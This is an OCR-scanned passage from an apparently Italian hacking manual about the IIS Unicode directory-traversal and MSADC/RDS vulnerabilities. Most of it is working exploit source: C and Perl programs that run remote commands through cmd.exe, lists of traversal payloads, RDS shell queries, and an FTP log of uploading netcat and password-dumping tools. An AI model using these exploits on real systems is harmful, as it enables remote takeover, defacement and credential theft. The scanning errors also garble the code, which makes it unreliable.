2) Eseguire "cmdl .exe /c echo aboaaa & dir & type aaa " 

http: //site/ scripts/ . . %cl%9c. ./ inetpub/ scripts / cmdl . exe? / c+echo+abc+> 
aaa&dir&type+aaa 

MS restituisce: 

" Directory of c: \inetpub\scripts 



/2000 03:48p 

10/25/2000 03:51p 6 aaa 
12/01/1999 05:00a 236,304 cmdl. exe 

abc 



L'exploit rilasciato da Optyx è il seguente : 
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/****************************************************************************\ 

** ** 

** Microsoft US 4.0/5.0 Extended UNICODE Directory Traversai Exploit ** 

** proof of theory exploit cuz it 's wednesday and 1 'm on the couch ** 

** ** 

** brought to you by the letter B, the number 7, optyx, and tl2 ** 

** optyx — <optyx@uberhaxOr . net optyx@newhack.city .net> ** 

** tl2 - <tl2@uberhax0r.net> ** 

** ** 

** greetz go out to aempirei, a gun toatin' gangstah' hustler' player ** 

** motherfucker who isn't with us anymore, miah, who's GTA2 game was ** 

** was most entertaining tonight, Cathy, who provided the trippy light ** 

** to stare at, and to KT, for providing me with hours of decent ** 

** conversation . ** 

** ** 
\* ****************************************** 



iinclude 
iinclude 
iinclude 
iinclude 
iinclude 
iinclude 
iinclude 
iinclude 
iinclude 
iinclude 
iinclude 



<stdio . h> 
<netdb.h> 
<stdlib.h> 
<string . h> 
<sys/socket . h> 
<sys/types . h> 
<netinet/in . h> 
<arpa/inet . h> 
<signal . h> 
<errno . h> 
<fcntl . h> 



void usage (void) 
{ 

fprintf (stderr, "usage: . /iis—zank <—t target> <—c ' command' or —i>"); 
fprintf (stderr, " [-p port] [-o timeout] \n") ; 
exit (-1) ; 

} 

int main(int argc, char **argv) 
{ 

int i, j; 
int port=80; 
int timeout=3; 
int interactive=0 ; 
char templi]; 
char host[512] = ""; 
char cmd[1024] = ""; 

char request [8192]="GET /scripts/ . .%c0%af. . /winnt/system32/cmd. exe?/c+" ; 
struct hostent *he; 
struct sockaddr_in s_addr; 

printf ( " iis—zank_bread chafer_8000 super_alpha hyper pickle . c\n ") ; 
printf("by optyx and tl2\n") ; 

for (i=0 ; i<argc; i++) 

{ if(argv[i][0] == '-') { 

for (j=l; j<strlen (argvfi] ) ; 
{ 

switch (argv[i ] [j] ) 
{ 

case ' t ' : 

strncpy (host, argv[i+l] , sizeof (host) ) ; 
break; 
case ' c ' : 

strncpy (cmd, argv[ i+1 ] , sizeof (cmd) ) ; 

break; 
case 'h ' : 

usage () ; 

break; 
case ' o ' : 

timeout=atoi (argv[i+l ] ) ; 

break; 
case 'p ' : 

port=atoi (argv[i+l ] ) ; 

break; 
case ' i ' : 

interactive=l ; 

break; 
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break; 

} 

} 

} 

} 

if(! strcmp (host, "")) 
{ 

fprintf (stderr, "speci fy target host\n") ; 
usage() ; 

} 

if ( ! strcmp (cmd, "") SS ! Interactive) 
{ 

fprintf (stderr, "speci fy command to execute\n") ; 
usage() ; 

} 

printf ("]- Target - %s:%d\n", host, port); 
if ( ! interactive) 

printf ("]- Command - %s\n", cmd); 
printf ("]- Timeout - %d seconds\n", timeout) ; 
if ( (he=gethostbyname (host) ) == NULL) 
{ 

fprintf (stderr, "invalid target\n") ; 
usage() ; 

} 

do 

( 

if (interactive) 
{ 

cmd[0]=0; 
printf ("\nC> ") ; 

if (fgets (cmd, sizeof (cmd) , stdin) == NULL) 
fprintf (stderr , "gets() error\n") ; 

cmd [strlen ( cmd) -1 ] = ' \ 0 ' ; 

if ( ! strcmp ( "exit ", cmd) ) 
exit(-l); 

} 

for (i=0; i<strlen (cmd) ; i++) 
{ 

if(cmd[i]==' ') 
cmd[i ]='+'; 

} 

strncpy (request, 

"GET / scripts / . .%cO%af. . /winnt/system32/cmd. exe?/c+" , 

sizeof (request) ) ; 
strncat (request, cmd, sizeof (request) - strlen (request) ) ; 
strncat (request, "\n", sizeof (request) - strlen (request) ) ; 

s_addr . sin_family = PF_INET; 
s_addr . sin_port = htons (port) ; 

memcpy ( (char *) Ss_addr . sin_addr, (char *) he->h_addr, 
sizeof (s^addr. sin addr) ) ; 

if ( (i=socket (PF_INET, SOCK_STREAM, IPPROTO^TCP) ) == -1) 
{ 

fprintf (stderr, "cannot create socket\n") ; 
exit (-1) ; 

} 

alarm (timeout) ; 

j = connect (i, (struct sockaddr *) Ss_addr, sizeof (s__addr) ) ; 
alarm (0) ; 

if(j==-l) 
{ 

fprintf (stderr, "cannot connect to %s\n" / host); 
exit (-1) ; 
dose (i) ; 

} 
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printf (" ']- Sending request: %s\n", request) ; 

send(i, request, strlen (request) , 0) ; 

if ( ! interactive) 

printf ("]- Getting results\n") ; 

while (recv (i, temp, 1, 0)>0) 
{ 

alanti (timeout) ; 
printf ("%c", temp[0]); 
alarm(O) ; 

} 

) 

while (interactive) ; 

dose (i) ; 
return 0; 

} 

Ilo seguente exploits invece è adatto ai sistemi Unix basandosi sulle normali funzioni della 
libreria socket. 

#include <stdio.h> 
#include <string.h> 
#include <stdlib.h> 
#include <errno.h> 
#include <string.h> 
#include <netdb.h> 
#include <sys/types.h> 
#include <netinet/in.h> 
#include <sys/socket.h> 
#include <sys/wait.h> 
#include <unistd.h> 
#include <fcntl.h> 

#defineSEND 100000 
#define RECIVE 1000000 



char *str_replace(char *rep, char *orig, char *string) 
{ 

int len=strlen(orig); 
char buf[SEND]=""; 
char *pt=strstr(string,orig); 

strncpy(buf,string, pt-string ); 

strcat(buf,rep); 

strcat(buf,pt+strlen(orig)); 

strcpy(string,buf); 

return string; 

} 



I**** ******* ******** 



********************************************************/ 



int main(int argcchar *argv[]) 
{ 

int sockfd, numbytes; 
char recv_buf [RECIVE]; 
int i; 
int port; 
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char *uni[]={ 

"..%cO%af..", 

". .%cO%af . ./. .%cO%af . ./. .%cO%af . .", 

". .%cO%af . .%cO%af . .%cO%af . .%cO%af . .%cO%af . .", 

"..%c1%1c", 

"..%d %1 c../..%c1 %1 c../..%c1 %1 e", 

"..%d %1 c..%c1 %1 c..%c1 %1 c..%c1 %1 c..%c1%1c", 

"..%252f..", 

"..%252f../..%252f../..%252f..", 
"..%252f..%252f..%252f..%252f..%252f..", 

"..%252e..", 
".%252e..", 

" . .%252e . ./. .%252e . ./. .%252e . . ", 
"..%252e..%252e..%252e..%252e..%252e..", 

"..%c0%9v..", 

"..%c0%9v../..%c0%9v../..%c0%9v..", 

". .%c0%9v. .%c0%9v. .%c0%9v. .%c0%9v. .%c0%9v. .", 

"..%cO%qf..", 

". .%cO%qf . ./. .%cO%qf . ./. .%cO%qf . .", 

". .%cO%qf . .%cO%qf . .%cO%qf . .%cO%qf . .%cO%qf . .", 

"..%c1%8s..", 
"..%c1%8s../..%c1%8s../..%c1%8s..", 
"..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s..", 

"..%c1%9c", 

"..%c1%9c../..%c1%9c../..%c1%9c..", 
"..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..", 

"..%c1%pc", 

"..%c1 %pc. ./. .%c1 %pc. ./. .%c1 %pc. .", 

"..%d %pc. .%c1 %pc..%c1 %pc. .%c1 %pc..%c1 %pc. .", 

"..%255c", 

"..%255c../..%255c../..%255c..", 

"..%255c. .%255c. .%255c. .%255c. .%255c. .", 

"..%5c", 

"..%5c../..%5c../..%5c", 
"..%5c..%5c..%5c..%5c..%5c..", 

"..%%35c", 

". .%%35c. ./. .%%35c. ./. .%%35c. .", 
"..%%35c../..%%35c../..%%35c", //last news 

". .%%35c. .%%35c. .%%35c. .%%35c. .%%35c. .", 

"..%%35%63..", 

" . .%%35%63. ./. .%%35%63 . ./. .%%35%63 

"..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..", 
"..%25%35%63..", 

" . .%25%35%63 . ./. .%25%35%63 . ./. .%25%35%63 

" . .%25%35%63 . .%25%35%63 . .%25%35%63 . .%25%35%63 . .%25%35%63 . . " 
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char *path[]={ 

"/scripts/#uni/winnt/system32/cmd.exe?/c+", 

"/scripts/#uniwinnt/system32/cmd.exe?/c+", 

"/msadc/#uni/winnt/system32/cmd.exe?/c+", 

"/cgi-bin/#uni/winnt/system32/cmd.exe?/c+", 

7samples/#uni/winnt/system32/cmd.exe?/c+", 

7iisadmpwd/#uni/winnt/system32/cmd.exe?/c+", 

"/_vti_cnf/#uni/winnt/system32/cmd.exe?/c+", 

"/_vti_bin/#uni/winnt/system32/cmd.exe?/c+", 

"/exchange/#uni/winnt/system32/cmd.exe?/c+", 

7pbserver/#u n i/wi n nt/syste m32/cmd . exe?/c+" , 

"/adsamples/#uni/winnt/system32/cmd.exe?/c+" 

}; 

int cont=0; 

char send_buf[SEND]=""; 
int xj; 

int uni_len=sizeof(uni)/sizeof(char *); 
int path_len=sizeof(path)/sizeof(char *); 



struct hostent *he; 

struct sockaddrjn their_addr; 



if(argc!=4) 
{ 

fprintf(stderr,"usage:%s <hostname> <port> <commands>\n",argv[0]); 
exit(1); 

} 



if((he=gethostbyname(argv[1]))==NULL) 
{ 

perror("gethostbyname"); 
exit(1); 

} 

port=atoi(argv[2]); 



I**** **************************** ******************************************* 

for(x=0;x<path_len;x++) 

for(j=0;j<uni_len;j++) 

{ 

sprintf(send_buf,"GET %s%s HTTP/ 1 .0\n\n", path[i],argv[3] ); 
str_replace(uni[j],"#uni",send_buf); 

if(cont==200) { 
sleep(3); 
cont=0; 

} 

cont++; 
sleep(1); 
if( fork()!=0) 
{ 
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if( (sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1) 
{ 

perrorfsocket"); 
exit(1); 

} 



their_addr.sin_family=AF_INET; 
their_addr.sin_port=htons(port); 
their_addr.sin_addr=*((struct in_addr*)he->h_addr); 
bzero(&(their_addr.sin_zero),8); 



if( connect(sockfd,(struct sockaddr*)&their_addr, sizeof(struct sockaddr))==-1) 

{ 

perror("connect"); 
exit(1); 

} 

if(send(sockfd,send_buf,SEND,0) ==-1 ) 
{ 

perror("send"); 
exit(O); 

} 

if( (numbytes=recv(sockfd,recv_buf,RECIVE,0 )) == -1) 
{ 

perror("recv"); 
exit(1); 

} 

recv_buf[numbytes]='\0'; 
//printf("%s\n",recv_buf); 

if( (numbytes=recv(sockfd,recv_buf,RECIVE,0 )) == -1) 
{ 

perror("recv"); 
exit(1); 

} 

recv_buf[numbytes]='\0'; 

printf("\n \n"); 

printf("String: %s\n\n",send_buf); 

printf("%s\n bytes recived: %d \n",recv_buf,numbytes); 



close(sockfd); 
exit(O); 

} 

close(sockfd); 

while(waitpid(-1 ,NULL, WNOHANG) > 0); 
} 



printf("Done...\n"); 

return 0; 

} 
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Un ulteriore exploits parametrizabile è quello che segue : 

/* hack MS 4.0/5.0 with the usefull UNICODE :) and have fun 7 

/* coded by zipo 7 

/* to compile: ce -o iisuni iisuni.c 7 

/* made for ali the lame populus :) 7 

#include <stdio.h> 

#include <string.h> 

#include <sys/socket.h> 

#include <signal.h> 

#include <netinet/in.h> 

#include <netdb.h> 

#define BUFF LEN 6000 

#define HTTP " HTTP/1. 0\r\n\r\n" 

#define GET "GET http://" 

/* this is the anonymous server used 7 

#define ANON "anon.free.anonymizer.com" 

/* this are ali the types of bugs 7 

#define BUG1_STR 

7msadc/..%cO%af../..%cO%af../..%cO%af../winnt/system32/cmd.exe?/c+" 
#define BUG2_STR '7scripts/..%c1 %9c../winnt/system32/cmd.exe?/c+" 
#define BUG3_STR 

7iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+" 

#define BUG4_STR "/" 

/* this is the MS http server port 7 

#define HTTP PORT 80 

int main (int arge, char *argv[]) { 

struct sockaddrin sin; 

struct hostent *he; 

char*bug,cmd[BUFF_LEN],recbuffer[BUFF_LEN],buffer[BUFF_LEN]; 
int sck, i; 
if (arge < 3) 

bad_params (argv[0]); 
switch (atoi(argv[2])) { 
case 1 : 

bug = BUG1_STR; 

break; 
case 2: 

bug = BUG2_STR; 

break; 
case 3: 

bug = BUG3_STR; 

break; 
case 4: 

bug = BUG4_STR; 

break; 
default: 

printf ("Number error\n"); 

exit(1); 

} 

while (1) { 
printf ("bash#"); 
fgets (cmd, sizeof(cmd), stdin); 
cmd[strlen(cmd)-1] = '\0'; 
if (strcmp(cmd, "exit")) { 

if (!strcmp(cmd, "clear")) { 
system("clear"); 
continue; 
} else if (!strcmp(cmd, "")) { 
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continue; 
} else if (!strcmp(cmd, "?")) { 
printf ("Just you need to type in the prompt the M$DOS 
command\n"); 

printf ("to exit type Y'exitA" :)\n"); 
continue; 

} 

/* prepare the string to be sent 7 
for (i=0;k=strlen(cmd);i++) { 
if (cmd[i] == 0x20) 
cmd[i] = 0x2b; 

} 

sprintf (buffer, "%s%s%s%s%s", GET, argv[1], bug, cmd, HTTP); 
/* get ip 7 

if ((he = gethostbyname (ANON)) == NULL) { 
herror ("host error"); 
exit (1); 

} 

/* setup port and other parameters 7 
sin.sin_port = htons (HTTP PORT); 
sin.sin_family = AFJNET; 

memcpy (&sin.sin_addr.s_addr, he->h_addr, he->h_length); 
/* create a socket 7 

if ((sck = socket (AFJNET, SOCK STREAM, 6)) < 0) { 
perror ("socket() error"); 
exit (1); 

} 

/* connect to the sucker 7 

if ((connect (sck, (struct sockaddr *) &sin, sizeof (sin))) < 0) { 
perror ("connect() error"); 
exit (1); 

} 

/* send the beautifull string 7 
write (sck, buffer, sizeof (buffer)); 
/* recive ali ! :) 7 

read (sck, recbuffer, sizeof (recbuffer)); 
/* and print it 7 

recbuffer[strlen(recbuffer)-1]='\0'; 
printf 

("\033[0;7m Received 

\n"); 

printf 

("%s\n Done 

\n\033[7;0m", recbuffer); 

/* dose the socket ... not needed any more 7 

dose (sck); 

/* put zero's in the buffers 7 
bzero (buffer, sizeof(buffer)); 
bzero (recbuffer, sizeof (recbuffer)); 
} else { 

/* you type "exit" cya :) 7 
exit(0); 

} 

} 

} 

/* you miss a parameter :'-( 7 

int bad_params (char *prog_name) { 

fprintf (stdout, "usage:\n\t%s <hostname> <number>\n", prog_name); 

fprintf (stdout, 

\n"); 
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fprintf (stdout, "<1> msadc\t"); 
fprintf (stdout, "<2> scripts\t"); 
fprintf (stdout, "<3> iisadmpwd\t"); 
fprintf (stdout, "<4>An"); 
fprintf (stdout, 

\n" ); 

exit (1); 




L'ultimo sorgente indirizzato ad eseguire un comando sul sistema remoto lo vedamo scritto in 
PERL. 



#!/usr/bin/perl 

# See http://www.securityfocus.com/vdb/bottom.html?section=exploit&vid=1 806 

# Very simple PERL script to execute commands on MS Unicode vulnerable servers 

# Use port number with SSLproxy for testing SSL sites 

# Usage: unicodexecute2 IP:port command 

# Only makes use of "Socket" library 
# 

# New in version2: 

# Copy the cmd.exe to something else, and then use it. 

# The script checks for this. 

# Thnx to security@nsfocus.com for discovering the cmd.exe copy part 
# 

# Roelof Temmingh 2000/1 0/26 

# roelof@sensepost.com http://www.sensepost.com 

use Socket; 
# init 

if ($#ARGV<1) {die "Usage: unicodexecute IP:port commandVY';} 

($host,$port)=split(/:/,@ARGV[0]); 

$target = inet_aton($host); 

# test if cmd has been copied: 

$failed=1 ; 
$command="dir"; 

@results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command 
HTTP/1 .0\r\n\r\n"); 
foreach $line (@results){ 
if ($line =~ /sensepost.exe/) {$failed=0;} 

} 

$failed2=1 ; 
if ($failed==1) { 

print "Sensepost.exe not found - Copying CMD...\n"; 
$command="copy c:\\winnt\\system32\\cmd.exe sensepost.exe"; 
$command=~s/ A%20/g; 

@results2=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command 
HTTP/1 .0\r\n\r\n"); 
foreach $line2 (@results2){ 
if (($line2 =~ /copied/ )) {$failed2=0;} 

} 

if ($failed2==1 ) {die "Copy of CMD failed - inspect manually:\n@results2\n\n"}; 

} 

# we can assume that the cmd.exe is copied from here.. 

$command=@ARGV[1]; 

print "Sensepost.exe found - Executing [$command] on $host:$port\n"; 
$command=~s/A%20/g; 
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my @results=sendraw("GET /scripts/..%cO%af../inetpub/scripts/sensepost.exe?/c+$command 
HTTP/1 .0\r\n\r\n"); 
print @results; 

# Sendraw - thanx RFP rfp@wiretrip.net 

sub sendraw { # this saves the whole transaction anyway 
my ($pstr)=@_; 

socket(S,PFJNET,SOCK_STREAM,getprotobyname('tcp')||0) || 

die("Socket problems\n"); 
if(connect(S,pack "SnA4x8",2,$port,$target)){ 

my @in; 

select(S); $|=1 ; print $pstr; 
while(<S>){ push @in, $_;} 
select(STDOUT); close(S); return @in; 
} else { die("Can't connect.An"); } 



Tra le varie Utilities che sono reperibili sulla rete ne esistono alcune che funzionano grazie a 
un interfaccia utente in ambiente WINDOWS. 
Una di queste si chiama IIS4-5.EXE. 

L'immagine che segue è la maschera di lavoro del programma. 



1 ftg Microsoft: IIS4.0 / 5.0 UNICODE Vuln. by REGGIE I ! 


1 x l 


About 

K Greetz to \ncubus, PreatOr, Securax.org 






Microsoft IIS4.0 / 5.0 UNICODE Vulnerable by Reggie 






V?) You are not authorized to view this 
I — I page 

1 






You might not have permission to view this directory or page using 
the credentials you supplied. 






If vou believe vou should be able to view this directory or Daae, — 






URL |http://localhost 
Corrinnand fdiTc:\ 

OK 




MSADC e RDS Exploits 



Un tipo di exploit basato sempre sull'interfaccia WEB è quello definito con il nome di MSADC 
Exploits. 

Il bugs dipende dal Remote Data Service (RDS) componente di MDAC ovvero il Microsoft 
Data Access Components. 
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La configurazione di default di RDS permetterebbe di inviare dei comandi da eseguire a MS i 
quali verrebbero mandati in esecuzione con gli stessi diritti legati all'utente con cui viene 
eseguito il servizio il quale normalmente è appunto SYSTEM. 

Questo bugs permetterebbe ipoteticamente a qualsiasi utente di prendere possesso di 
qualsiasi sistema in rete.. 

TUTTE le versioni di MDAC sono vulnerabili se al momento dell' installazione sono state 
inserite anche le pagine d'esempio di RDS. 

La vulnerabilità vive iun due diversi componenti di RDS e precisamente nel DataFactory 
Object e nel VbBusObj object. 

Il Remote Data Service è stato progettato per abilitare I client del WEB ad inviare delle 
QUERY usando http verso delle risorse di dati remote tenute in hostintg su MS Web server. 
Il client remote comunica con la dll, msadcs.dll, sul server, il quale usa il DataFactory object 
per abilitare lo scambio con il database. 

Il problema sorge a causa di una caratteristica del Microsoft's Jet database engine, il quale 
permette ad una stringa di SQL query a contenere degli argomenti embedded, tramite i quali 
è possibile specificare dei comandi VBA (Visual Basic for Applications). 
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Questa possibilità permette ad un attaccante di eseguire del codice arbitrariamente attraverso 
una shell, aiutata da una pecca di MS il quale permette l'esecuzione di comandi ODBC con i 
privilegi systemjocal. 

Il risultato è che una attaccante può connettersi a un WEB server MS vulnerabile attraverso 
Internet, inizializzare una connessione SQL con un database sul server tramite msadcs.dll, e 
quindi inviare comendi embedded VBA al server stesso. 

I comandi VBA vengono eseguiti dal database engine, attraverso una shell di comandi, 
permettendo all'attaccante di possedere dei privilegi non autorizzati per l'accesso al server. 
Nel caso in cui il bugs sia dovuto al DataFactory object, l'attaccante conta sulla presenza dei 
compojnenti vulnerabili MDAC, I quali sono installati di default da MS. 

II DSN fornisce le informazioni legate alla connessione per accedere ai files di dati. 
L'attaccante può anche utilizzare un DSN esistente, 0 può specificare manualmente la 
locazine del file .mdb file sul server. 
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Di conseguenza qualsiasi .mdb di defgault oppure DSN sul server vulnerabile può essere 
utilizzato per lanciare un attacco. 

Alcuni files possono essere installati come files d'esempio fa Windows stesso o da qualsiasi 
altro programma. 

Un metodo alternativo d'attacco possiede come obbiettivo il VbBusObj object. 

Questo oggetto è installato come parte delle pagine d'esempio ma che comqunue non vengo 

no installate di default. 

Queste sono invece installate di default dal MDAC 2.0 Software Developers Kit. 
Questo attacco funziona nello stesso modo dell'attacco al DataFactory. 

Rintracciare i sistemi vulnerabili sulla rete è semplice in quanto con un linguaggio come PERL 
e il solito NETCAT è possibile eseguire uno scannino alla ricerca del segno che 
testimonierebbe questa vulnerabilità ovvero la presenza della dll msadcs.dll. 
Per riuscire a comprendere se un determinato HOST è vulnerabile è possibile inviare : 

GET /msadc/msadcs.dll HTTP/1 .0 



Se la risposta è : 

HTTP/1.1 200 OK 

Server : Mi eroso ft -US/ 4 . 0 

Date: Sun, 04 Feb 2001 12:43:21 GMT 




allora il server è vulnerabile. 

La verifica invece relativa alla disponibilità di RDS e quella invece legata al suo corretto 
funzionamento può essere fatta inviando mediante il metodo POST una delle seguenti query 
RDS : 

Normal QUERY 

POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1 .1 
VbBusObj to bypass custom handlers 

POST /msadc/msadcs . dll/VbBusObj . VbBusObjCls . GetRecordset 
Query VbBusObj for NetBIOS name 



Si. ...RDS è in funzione se la risposta è : 

User-Agent : 
ACTIVEDATA 

Host : lab . wiretrip . net 
Content-Length : 645 
Connection : Keep-Alive 

ADCClientVersion : 01 . 06 

Content-Type : multipart/mixed; boundary= ! ADM ! ROX ! YOUR ! WORLD ! ; num- 
args=3 



— !ADM! ROX ! YOUR ! WORLD ! 
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Content-Type : application /x-varg 
Content-Length : 436 



'!ADM!ROX!YOUR!WORLD!' è di fatto una stringa MIME di separazione che come vedremo 
viene utilizzata anche da MSADC.PL 

Il test di funzionamento di RDS può anche avvenire cercando di creare un file chiamato FUN 
e inserendogli dentro il testo WERD. 

Select*fromCustomerswhereCity = ' I s h e 
11 ("cmd/cechowerd>>c: \ f u n " ) / 'driver 
= {MicrosoftAccessDriver ( * . m d b ) } ; d b q 
= c : \ w i n n t \ help\iis\htm\tutorial \ b t c 
u s t m r . mdb; 



Altre funzioni legate alla copia di files, al loro renarne possono essere tentate con : 

GET 

/msadc/ . .A~ . ./. .À — . ./. .À — . . /winnt/system32/cmd. exe?/c+copy+C : \winnt\s 



Copia CMD.EXE nella directory dove l'hacker intende usarlo. 

Il comando server a riscrivere default.html, cosa utilizzata quando si esegue un defacement di 
un sito. 

Come abbiamo già visto esistono alcuni file che possono essere considerati le basi per 
riuscire a crearsi delle shell nei sistemi remoti e precisamente ROOTKIT e NETCAT. 
Il fatto che in qualche caso esiste la necessità di copiare dentro ad un sistema dei files ci 
porta a considerare il seguente metodo per eseguire queste funzioni tra i metodo più utili 
eseguibili com questo tipo di attacco. 

Nell'esempio che segue viene utilizzato FTP per trasferire dei files da o verso il sistema. 
FTP Execution String via RDS: 

Select * from Customers where City =' \ shell ( "cmd /c ftp-s : ftpcom- 
nwww .nether . net") I ' driver={Microsoft Access Driver (* .mdb) } ; 
dbq=c : winnt \help\iis\htmtutorial \btcustmr . mdb ; 

— !ADM!ROX! YOUR ! WORLD ! A x 



220 freenet.nether.net FTP server (SunOS 5.7) ready. 



GET /msadc/. ./. ./. ./. ./. ./. ./program files /common files /system /msadc/ 



220-Serv-U FTP-Server v2.5h for WinSock ready... 

220 H-A-C-K T-H-E P-L-A-N-E-T 

220-W3 \_c0m3 TO JohnA's 0d4y Ef-Tee-Pee S3rv3r. 
220-Featuring 100% elite haxOr warez ! @$#@ 

220-Im running win 95 (Release candidate 1) , on a p33, with 16mb Ram. 

220 H-A-C-K T-H-E P-L-A-N-E-T 

USER johna2k 

331 User name okay, need password. 
PASS haxedjOO 

230 User logged in, proceed. 
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PORT 172, 16, 1, 106, 12, 71 

200 PORT Command successful . 

150 Openlng ASCII mode data connection for nc.exe (59392 bytes) . 
150 Opening ASCII mode data connection for pdump.exe (32768 bytes) . 
150 Opening ASCII mode data connection for samdump.dll (36864 bytes) . 
226 Transfer complete. 
221 Buh bye, you secksi haxOr jOO 



L'exploits classico che si trova sulla rete legato a questo BUGS è scritto in PERL e il codice è 
quello che segue. 

Per lanciarlo è possibile utilizzare la seguente sintassi : 



# .' /usr/bin/perl 
# 

# MSADC/RDS 'usage' (aka exploit) script version 2 
# 

# by rain forest puppy 
# 

# - added UNC support, really didn 't clean up code, but oh well 

use Socket; use Getopt : : Std; 

getopts ( "e : vd : h : XRVNwcu : s : ", \ %args) ; 

print " — RDS smack v2 — rain forest puppy / ADM / wiretrip — \n" ; 

if (ìdefined $args(h) && ìdefined $args{R}) { 
print qq~ 

Usage: msadc.pl -h <host> { -d <delay> -X -v } 

-h <host> = host you want to scan (ip or domain) 

—d <seconds> = delay between calls, default 1 second 

—X = dump Index Server patti table, if available 

-N = query VbBusObj for NetBIOS name 

—V = use VbBusObj instead of ActiveDataFactory 

—v = verbose 

—e = external dictionary file for step 5 
-u <\\\\host\\share\\file> = use UNC file 

—w = Windows 95 instead of Windows NT 

-c = vi compatibility (three step query) 

—s <number> = run only step <number> 

Or a —R will resumé a (v2) command session 

~; exit;} 

########################################################### 

# config data 

@drives= ( "c" , "d", "e", "f", "g", "h") ; 

@sysdirs= ( "winnt" , "winnt35" , "winnt351 " , "win", "Windows") ; 

# we want 'wicca' first, because if step 2 made the DSN, it ' s ready to go 
@dsns= ( "wicca" , "AdvWorks", "pubs", "CertSvr", "CFApplications" , 

"cfexamples", "CFForums" , "CFRealm", "cfsnippets" , "UAM", 
"banner", "banners", "ads", "ADCDemo ", "ADCTest ") ; 

# this is sparse, because I don 't know of many 
@sysmdbs= ( "\ \catroot\ \icatalog.mdb" , 

" \ \help\ \iishelp\ \iis \ \htm\ \tutorial \ \eecustmr . mdb ", 

"\ \system32\ \help\ \iishelp\ \iis\ \htm\ \tutorial\ \eecustmr.mdb", 

"\\ sys t em32 \ \ certmdb . mdb " , 

" \ \system32\ \ ias \ \ ias .mdb" , 

"\ \system32\ \ias\ \dnary .mdb" , 

"\\system32WcertlogWcertsrv.mdb" ); ithese are %systemroot% 
@mdbs= ( "\ \cfusion\ \cfapps\ \cfappman\ \data\ \applications .mdb" , 
"\\ cfusion \ \ cfapps \ \ forums \ \ forums__ . mdb ", 
"\ \cfusion\ \cfapps\ \forums\ \data\ \ forums .mdb" , 
"\ \cfusion\ \cfapps\ \security\ \realm_.mdb" , 
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"\ \cfus±on\ \cfapps\ \security\ \data\ \realm.mdb" , 
"\ \cfus±on\ \database\ \cfexamples .mdb" , 
"\ \cfus±on\ \database\ \cfsnippets .mdb" , 

"\ \inetpub\ \iissamples\ \sdk\ \asp\ \database\ \authors.mdb", 

"\ \progra~l \ \common~l \ \system\ \msadc\ \samples\ \advworks . mdb ", 

"\ \cfus±on\ \brighttiger\ \database\ \cleam.mdb" , 

"\ \cfus±on\ \database\ \smpolicy.mdb ", 

"\ \cfus±on\ \ database\cypress .mdb", 

"\ \progra~l \ \ableco~l \ \ablecommerce\ \databases\ \acb2_mainl .mdb", 
"\ \webs±te\ \cgi-win\ \dbsample .mdb" , 

"\ \perl\ \prk\ \bookexamples\ \modsamp\ \database\ \contact.mdb", 
"\ \perl\ \prk\ \bookexamples\ \utilsamp\ \data\ \access\ \prk.mdb " 
) ; ithese are just \ 
§#######§§########§§§#######§§########§§########§§########§ 

$ip=$args{h} ; $clen=0; $reqlen=0; $1=1; $target=""; 
if (defined $args{v}) { $verbose=l; } else { $verbose=0; } 
if (defined $args(d}) { $delay=$args{d} ; } else {$delay=l;} 
lf(!defined $args(R}) { $target= inet_aton ($ip) 

Il die ("inet_aton problems; host doesn't exist?") ; } 
if ('.defined $args{R)){ $ret = Shas_msadc; } 

if (defined $args{X}) { Shork_idx; exit; } 
if (defined $args{N}) { Sget_name; exit; } 

if (defined $args{w}) {$comm="command /c" ; } else {$comm="cmd /c";} 
if (defined $args(R}) { iload; exit; } 

print "Type the command line you want to run ($comm assumed) :\n" 

. "$comm "; 
$in=<STDIN>; chomp $in; 
$command=" $comm " . $in ; 

if (! defined $args{s} Il $args{s}==l) { 

print "\nStep 1: Trying raw driver to btcustmr .mdb\n" ; 
&try_btcustmr; ) 

if ('.defined $args{s} Il $args{s}==2) { 

print "\nStep 2: Trying to make our own DSN. . . "; 

if (Smake__dsn) { print "<<success»\n" ; sleep(3); } else { 

print "<<fail»\n"; )} # we need to sleep to let the server catchup 

if ('.defined $args{s) Il $args{s)==3) { 
print "\nStep 3: Trying known DSNs..."; 
Sknowndsn; } 

if ('.defined $args{s} Il $args {s }==4) ( 
print "\nStep 4: Trying known .mdbs. . . "; 
&known_mdb ; } 

if (! defined $args{s} Il $args{s}==5) { 

if (defined $args{u}){ 

print "\xStep 5: Trying UNC. . . "; 

fuse une; } else { "\nNo —u; Step 5 skipped.\n"; }} 

if ('.defined $args{s} Il $args{s}==6) { 
if (defined $args{e}){ 

print "\nStep 6: Trying dictionary of DSN names . . . "; 
&dsn_dict; } else { "\nNo -e; Step 6 skipped.\n"; )} 

print "\ti\tiNo luck, guess you' 11 have to use a real hack, eh?\n"; 
exit; 

############################################################################## 

sub sendraw { # this saves the whole transaction anyway 

my ($pstr)=@_; 

socket (S, PF_INET, SOCK_STREAM, getprotobyname ('tep') / IO) Il 

die ("Socket problems\n") ; 
if (connect (S,pack "SnA4x8", 2, 80, $target) ) { 

open (OUT, ">raw. out ") ; my @in; 

select(S); $1=1; print $pstr; 

while (<S>) { print OUT $_; push @in, $_; 

print STDOUT "." if (defined $args{X}) ; } 

dose (OUT) ; select (STDOUT) ; dose (S) ; return @in; 
} else { die("Can't connect .. .\n") ; }} 
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############################################################################## 

sub make_header { # make the HTTP request 

my $aa, $bb; 

if (defined $args{V}){ 

$aa="VbBusObj . VbBusObjCls . GetRecordset "; 
$bb="2 "; 
} else { 

$aa="AdvancedDataFactory . Query "; 
$bb="3"; } 

$msadc=«EOT 

POST /msadc/msadcs .dll/$aa HTTP/1.1 
User-Agent: ACTIVEDATA 
Host : $ip 

Content-Length : $clen 
Connection: Keep-Alive 

ADCClientVersion -.01.06 

Content-Type : multipart/mixed; boundary= ! ADM ! ROX ! YOUR ! WORLD ! ; num-args=$bb 

— ! ADM! ROX! YOUR ! WORLD ! 
Content-Type: application/x-varg 
Content-Length: $reqlen 

EOT 

r 

$msadc=~s/\n/\r\n/g; 
return $msadc; } 

############################################################################## 

sub makereq { # make the RDS request 

